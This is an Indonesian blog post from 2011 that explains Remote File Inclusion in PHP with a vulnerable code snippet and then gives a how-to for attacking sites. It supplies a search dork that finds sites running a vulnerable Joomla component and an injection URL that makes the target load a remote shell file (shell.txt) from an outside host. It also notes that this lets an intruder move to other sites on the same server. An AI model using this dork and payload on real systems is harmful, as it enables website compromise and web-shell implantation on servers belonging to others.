Rabu, 23 Maret 2011

0 RFI (Remote File Include)


Apa itu RFI ( Remote File Include ) :
RFI adalah adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server .. !!!
Kenapa bisa terjadi RFI :
Dalam bahasa pemrograman PHP terdapat bugs PHP yang salah satunya adalah RFI .. !!!
Contoh kesalahan coding PHP berikut ini :
Quote:if(!$_GET['p']
$p=”main”;

$p=$_GET['p'];

dari codingan diatas kenapa bisa terjadi bugs RFI karena adanya pemanggilan procedure secara global. dalam metode Hacking RFI ini, dapat membahayakan domain2 lainnya yang berada dalam 1 server… !!!!
Kenapa bisa terjadi ??
Karena tidak adanya configurasi pembatas (chmod) antara website yang satu dengan yang lainnya, jadi intinya apabila server tidak di konfigurasi secara aman, maka dapat memungkinkan penyusup untuk lopat dari website yang dapat diinjeksi melalui metode RFI kedalam website lainnya yang berada dalam satu server … !!!
Berikut contoh injek dengan RFI .. !!!
Seumpama kita menggunakan dork :
Code:
inurl:index.php?option=”com_thopper”
Code:
http://www.example.com/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://myweb.com/shell.txt

0 komentar:

Poskan Komentar

Kalau Comment Jangan Junk Ya

Free Blog Promotion

Untuk mengatur bagaimana tampilan tooltip tersebut nantinya, maka disini memerlukan kode style. Kode yang diperlukan seperti berikut ini.